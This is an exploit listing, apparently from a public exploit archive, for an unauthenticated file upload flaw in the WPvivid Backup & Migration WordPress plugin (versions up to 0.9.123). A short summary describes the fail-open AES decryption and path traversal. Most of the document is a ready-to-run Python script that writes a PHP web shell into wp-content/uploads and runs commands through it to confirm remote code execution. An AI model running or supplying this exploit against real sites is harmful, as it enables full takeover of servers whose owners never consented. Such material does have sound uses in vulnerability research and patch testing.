Share
## https://sploitus.com/exploit?id=PACKETSTORM:216289
=============================================================================================================================================
    | # Title     : WordPress WPvivid Backup and Migration 0.9.123 Unauthenticated Arbitrary File Upload Leading to RCE                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://wpvivid.com/                                                                                                        |
    =============================================================================================================================================
    
    [+] Summary    : A critical vulnerability in the WPvivid Backup & Migration plugin for WordPress allows unauthenticated attackers to upload arbitrary files, potentially resulting in Remote Code Execution (RCE).
                     The issue stems from a cryptographic fail‑open condition combined with insufficient file path validation. When RSA decryption fails, the plugin continues processing encrypted data 
    				 using a predictable AES configuration (null key and null IV). This bypasses intended authentication controls.
                     Additionally, improper validation of file paths enables directory traversal, allowing attackers to write files outside the intended backup directory β€” including 
    				 into wp-content/uploads/. If PHP execution is permitted in that directory, this can lead to full server compromise.
    
    
    [+] POC : 
    
    #!/usr/bin/env python3
    
    import argparse
    import base64
    import hashlib
    import json
    import random
    import string
    import sys
    from urllib.parse import urljoin
    
    import requests
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad
    
    
    def banner():
        print(r"""
       ╔══════════════════════════════════════════════════════════╗
       β•‘           BY indoushka  WPvivid RCE PoC                  β•‘
       β•‘        WPvivid Backup & Migration <= 0.9.123             β•‘
       β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
        """)
    
    
    SHELL_CONTENT = '<?php system($_GET["cmd"]); ?>'
    _rand_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=24))
    UPLOAD_PATH = f'../uploads/{_rand_name}.php'
    
    
    def generate_payload() -> str:
        """
        Generates the encrypted exploit payload.
        """    
        null_key = b"\x00" * 16
        null_iv = b"\x00" * 16
        cipher = AES.new(null_key, AES.MODE_CBC, iv=null_iv)
        params = {
            "backup_id": "1",
            "name": UPLOAD_PATH,
            "data": base64.b64encode(SHELL_CONTENT.encode()).decode(),
            "offset": 0,
            "file_size": len(SHELL_CONTENT),
            "total_size": len(SHELL_CONTENT),
            "index": 0,
            "md5": hashlib.md5(SHELL_CONTENT.encode()).hexdigest(),
            "type": "backup",
            "status": "running"
        }
        plaintext = json.dumps(params).encode()
        encrypted = cipher.encrypt(pad(plaintext, AES.block_size))
        fake_key = b"ABC"
        packet = (
            format(len(fake_key), "03x").encode()      
            + fake_key
            + format(len(encrypted), "016x").encode()   
            + encrypted
        )
    
        return base64.b64encode(packet).decode()
    
    
    def exploit(target_url: str, verify_cmd: str) -> bool:
        """
        Sends the exploit payload to the target and verifies RCE.
        """
        target_url = target_url.rstrip("/") + "/"
    
        print(f"[*] Target       : {target_url}")
        print(f"[*] Upload path  : {UPLOAD_PATH}")
        print(f"[*] Verify cmd   : {verify_cmd}")
        print()
        print("[+] Generating encrypted payload (AES-128-CBC, null key + null IV)...")
        payload = generate_payload()
        print(f"[+] Payload size : {len(payload)} bytes (base64)")
        print("[+] Sending exploit via wpvivid_action=send_to_site ...")
        try:
            resp = requests.post(
                target_url,
                data={
                    "wpvivid_action": "send_to_site",
                    "wpvivid_content": payload,
                },
                timeout=30,
            )
            print(f"[+] Response     : {resp.status_code}")
            if resp.text:
                print(f"[+] Body         : {resp.text[:500]}")
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")
            return False
    
        shell_filename = UPLOAD_PATH.split("/")[-1]
        shell_url = urljoin(target_url, f"wp-content/uploads/{shell_filename}")
        verify_url = f"{shell_url}?cmd={verify_cmd}"
    
        print()
        print(f"[+] Verifying RCE at: {verify_url}")
        try:
            verify_resp = requests.get(verify_url, timeout=15)
            if verify_resp.status_code == 200 and verify_resp.text.strip():
                print(f"[βœ“] RCE Confirmed!")
                print(f"[βœ“] Output:\n{verify_resp.text.strip()}")
                return True
            else:
                print(f"[!] Shell responded with status {verify_resp.status_code}")
                print(f"[!] Body: {verify_resp.text[:200]}")
                return False
        except requests.RequestException as e:
            print(f"[-] Verification failed: {e}")
            return False
    
    def main():
        banner()
    
        parser = argparse.ArgumentParser(
            description="CVE-2026-1357 WPvivid Backup & Migration RCE PoC"
        )
        parser.add_argument(
            "-u", "--url",
            required=True,
            help="Target WordPress URL (e.g. http://localhost)"
        )
        parser.add_argument(
            "-c", "--cmd",
            default="id",
            help="Command to execute for RCE verification (default: id)"
        )
    
        args = parser.parse_args()
    
        success = exploit(args.url, args.cmd)
        sys.exit(0 if success else 1)
    
    
    if __name__ == "__main__":
        main()
    
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================